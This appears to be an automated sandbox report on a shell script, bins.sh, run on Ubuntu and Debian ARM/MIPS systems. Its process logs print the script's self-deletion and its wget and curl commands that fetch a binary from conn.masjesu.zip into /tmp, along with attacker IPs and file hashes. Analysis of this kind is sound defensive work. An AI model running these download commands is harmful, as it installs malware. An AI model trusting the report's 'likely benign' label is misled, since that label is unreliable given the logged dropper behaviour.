Malware Analysis Report

2025-05-28 20:29

Sample ID: 241125-n31jtsvqdv
Target: bins.sh
SHA256: d48a791f79ce65f71407a1ceeb21d49c644392c3c4d13b329334755a53ee96ad
Tags: discovery antivm
Score: 4/10


Analysis Overview

Score: 4/10

SHA256: d48a791f79ce65f71407a1ceeb21d49c644392c3c4d13b329334755a53ee96ad

Threat Level: Likely benign

The file bins.sh was found to be: Likely benign.

Malicious Activity Summary

discovery antivm

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-11-25 11:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-25 11:56
Reported: 2024-11-25 11:58
Platform: ubuntu1804-amd64-20240611-en
Max time kernel: 149s
Max time network: 131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description  Indicator  Process        Target
N/A          N/A        /usr/bin/wget  N/A
N/A          N/A        /usr/bin/curl  N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country  Destination         Domain                    Proto
N/A      224.0.0.251:5353                              udp
US       1.1.1.1:53          conn.masjesu.zip          udp
US       1.1.1.1:53          conn.masjesu.zip          udp
GB       185.125.188.62:443                            tcp
GB       185.125.188.61:443                            tcp
US       151.101.193.91:443                            tcp
US       151.101.193.91:443                            tcp
GB       89.187.167.3:443                              tcp
US       1.1.1.1:53          1527653184.rsc.cdn77.org  udp
US       1.1.1.1:53          1527653184.rsc.cdn77.org  udp
GB       89.187.167.38:443   1527653184.rsc.cdn77.org  tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-25 11:56
Reported: 2024-11-25 11:58
Platform: debian9-armhf-20240418-en
Max time kernel: 149s
Max time network: 3s

Command Line

[/tmp/bins.sh]

Signatures

Checks CPU configuration

antivm
Description              Indicator      Process        Target
File opened for reading  /proc/cpuinfo  /usr/bin/curl  N/A

Reads runtime system information

discovery
Description              Indicator                      Process        Target
File opened for reading  /proc/sys/crypto/fips_enabled  /usr/bin/curl  N/A
File opened for reading  /proc/self/auxv                /usr/bin/curl  N/A

System Network Configuration Discovery

discovery
Description  Indicator  Process        Target
N/A          N/A        /usr/bin/curl  N/A
N/A          N/A        /usr/bin/wget  N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country  Destination  Domain            Proto
US       1.1.1.1:53   conn.masjesu.zip  udp
US       1.1.1.1:53   conn.masjesu.zip  udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted: 2024-11-25 11:56
Reported: 2024-11-25 11:58
Platform: debian9-mipsbe-20240611-en
Max time kernel: 149s
Max time network: 150s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description              Indicator                      Process        Target
File opened for reading  /proc/sys/crypto/fips_enabled  /usr/bin/curl  N/A

System Network Configuration Discovery

discovery
Description  Indicator  Process        Target
N/A          N/A        /usr/bin/wget  N/A
N/A          N/A        /usr/bin/curl  N/A

Writes file to tmp directory

Description                   Indicator                                  Process        Target
File opened for modification  /tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS  /usr/bin/wget  N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country  Destination         Domain            Proto
US       1.1.1.1:53          conn.masjesu.zip  udp
BG       87.120.125.191:80   conn.masjesu.zip  tcp
US       216.126.231.240:80  conn.masjesu.zip  tcp
US       1.1.1.1:53          conn.masjesu.zip  udp
BG       87.120.125.191:80   conn.masjesu.zip  tcp

Files

/tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS

MD5 cd3d4b9c643e5b473fb4d88ed05f0716
SHA1 64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256 0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512 164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

Analysis: behavioral4

Detonation Overview

Submitted: 2024-11-25 11:56
Reported: 2024-11-25 11:58
Platform: debian9-mipsel-20240729-en
Max time kernel: 150s
Max time network: 150s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description              Indicator                      Process        Target
File opened for reading  /proc/sys/crypto/fips_enabled  /usr/bin/curl  N/A

System Network Configuration Discovery

discovery
Description  Indicator  Process        Target
N/A          N/A        /usr/bin/wget  N/A
N/A          N/A        /usr/bin/curl  N/A

Writes file to tmp directory

Description                   Indicator                                  Process        Target
File opened for modification  /tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS  /usr/bin/wget  N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country  Destination         Domain            Proto
US       1.1.1.1:53          conn.masjesu.zip  udp
BG       87.120.125.191:80   conn.masjesu.zip  tcp
US       216.126.231.240:80  conn.masjesu.zip  tcp
US       1.1.1.1:53          conn.masjesu.zip  udp
BG       87.120.125.191:80   conn.masjesu.zip  tcp

Files

/tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS

MD5 cd3d4b9c643e5b473fb4d88ed05f0716
SHA1 64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256 0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512 164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52